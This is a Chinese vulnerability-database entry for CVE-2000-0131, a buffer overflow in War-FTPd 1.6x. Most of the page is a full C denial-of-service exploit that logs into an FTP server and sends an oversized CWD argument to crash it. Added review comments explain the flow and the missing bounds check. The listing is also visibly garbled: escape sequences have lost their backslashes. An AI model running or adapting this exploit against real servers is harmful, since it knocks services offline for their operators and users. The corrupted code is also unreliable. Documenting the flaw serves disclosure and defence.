War-FTPd 1.6x CWD/MKD DoS漏洞
漏洞ID | 1105701 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 2000-02-03 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2000-0131 |
CNNVD-ID | CNNVD-200002-013 |
漏洞平台 | Windows | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
War-FTPd 1.6x 版本在处理 MKD 和 CWD 命令时存在缓冲区溢出漏洞。远程用户提交带有超长路径参数的 MKD 或 CWD 命令,可使服务器崩溃,造成拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/966/info
War-FTPd 1.67 and possibly previous versions are susceptible to a buffer overflow DoS attack.
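Due to improper bounds checking in the code that handles MKD and CWD commands, it is possible to remotely crash the server by submitting extremely long pathnames as arguments to either command. The sample below logs in with a supplied user name and password before it sends the over-long CWD argument, so in this listing the vulnerable handler is reached only after authentication.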
/*--------------------------------------------------------------*/
/* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
/*--------------------------------------------------------------*/
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
/* TCP port main() connects to (the FTP control channel). */
#define FTP_PORT 21
/* Size of buf, the filler string used as the CWD argument: main() fills it
   with MAXBUF-1 filler bytes and a terminating NUL. */
#define MAXBUF 8182
/* NOTE(review): alternative filler size left commented out by the author;
   the page does not say what this value corresponds to. */
//#define MAXBUF 553
/* Size of packetbuf, which main() reuses both for server replies (recv)
   and for every outgoing command line (sprintf). */
#define MAXPACKETBUF 32000
/* Byte value written into buf. 0x90 is the x86 NOP opcode, but this listing
   sends filler only; nothing else is appended to it. */
#define NOP 0x90
/*
 * Demonstration client for the War-FTPd 1.6x CWD overflow described above.
 *
 * Flow as written: initialise Winsock, resolve argv[1], connect to TCP port
 * FTP_PORT, send USER and PASS built from argv[2] and argv[3], then send one
 * CWD command whose argument is MAXBUF-1 bytes of 0x90, and close the socket.
 * Every server reply is read into packetbuf and then overwritten, so the
 * program never checks whether login succeeded or whether the server stopped.
 *
 * What this looks like from the server side: after a normal login, a single
 * control-channel command line of roughly 8 KB. Per the advisory text the
 * root cause is missing bounds checking on the pathname argument, so the
 * server-side remedy is a length check before that argument is copied.
 *
 * NOTE(review): every string literal below ends in "n" or "rn" where an
 * escape sequence would be expected; the backslashes appear to have been
 * lost when this page was extracted, so the listing is not a faithful copy
 * of the original source.
 * NOTE(review): `void main` is non-standard; failure paths leave via exit().
 */
void main(int argc,char *argv[])
{
SOCKET sock;
unsigned long victimaddr;
SOCKADDR_IN victimsockaddr;
WORD wVersionRequested;
int nErrorStatus;
/* static, so these large buffers are not placed on the stack;
   q is declared but never used in this function. */
static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q;
/* NOTE(review): bare `hostent` without `struct` is not valid C unless a
   typedef is in scope; the file was presumably built as C++ - confirm. */
hostent *victimhostent;
WSADATA wsa;
/* NOTE(review): the usage text names three arguments but this guard accepts
   two, so argv[3] (read for PASS below) is NULL when Password is omitted. */
if (argc < 3){
printf("Usage: %s TargetHost UserName Passwordn",argv[0]); exit(1);
}
/* Request Winsock 1.1. */
wVersionRequested = MAKEWORD(1, 1);
nErrorStatus = WSAStartup(wVersionRequested, &wsa);
/* WSACleanup is registered before the WSAStartup result is checked, and it
   is also called explicitly at the end of main, so on the normal path it
   runs twice. The cast discards WSACleanup's int return type. */
if (atexit((void (*)(void))(WSACleanup))) {
fprintf(stderr,"atexit(WSACleanup)failedn"); exit(-1);
}
if ( nErrorStatus != 0 ) {
fprintf(stderr,"Winsock Initialization failedn"); exit(-1);
}
if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
fprintf(stderr,"Can't create socket.n"); exit(-1);
}
/* Try argv[1] as a dotted-quad address first; -1 (all bits set once
   converted to unsigned long) is treated as "not an address", in which
   case the name is resolved through gethostbyname(). */
victimaddr = inet_addr((char*)argv[1]);
if (victimaddr == -1) {
victimhostent = gethostbyname(argv[1]);
if (victimhostent == NULL) {
fprintf(stderr,"Can't resolve specified host.n"); exit(-1);
}
else
/* Only the first address in the resolver's list is used. */
victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0]));
}
victimsockaddr.sin_family = AF_INET;
victimsockaddr.sin_addr.s_addr = victimaddr;
victimsockaddr.sin_port = htons((unsigned short)FTP_PORT);
memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero));
if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){
fprintf(stderr,"Connection refused.n"); exit(-1);
}
printf("Attacking war-ftpd ...n");
/* Read and discard the server greeting; the return value is ignored. */
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
/* NOTE(review): unbounded sprintf of a command-line argument into packetbuf;
   nothing checks that argv[2] fits in MAXPACKETBUF bytes. */
sprintf((char *)packetbuf,"USER %srn",argv[2]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
/* Reply to USER is read and discarded. */
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
/* Same unbounded pattern for the password; see the argc note above for
   the case where argv[3] is NULL. */
sprintf((char *)packetbuf,"PASS %srn",argv[3]);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
/* Reply to PASS is read and discarded, so a failed login is not detected. */
recv(sock,(char *)packetbuf,MAXPACKETBUF,0);
/* Build the over-long argument: MAXBUF-1 bytes of 0x90, NUL-terminated. */
memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0;
/* "CWD " plus the filler plus the terminator characters fits in packetbuf
   because MAXBUF (8182) is well below MAXPACKETBUF (32000). */
sprintf((char *)packetbuf,"CWD %srn",buf);
send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
/* Pause 100 ms before closing - presumably to let the send complete; the
   server's response to CWD is never read. */
Sleep(100);
/* 2 disables both sending and receiving on the socket (SD_BOTH). */
shutdown(sock, 2);
closesocket(sock);
WSACleanup();
printf("done.n");
}
|参考资料
来源:BID
名称:966
链接:http://www.securityfocus.com/bid/966
来源:OSVDB
名称:4677
链接:http://www.osvdb.org/4677
来源:BUGTRAQ
名称:20000201war-ftpd1.6xDoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=94960703721503&w=2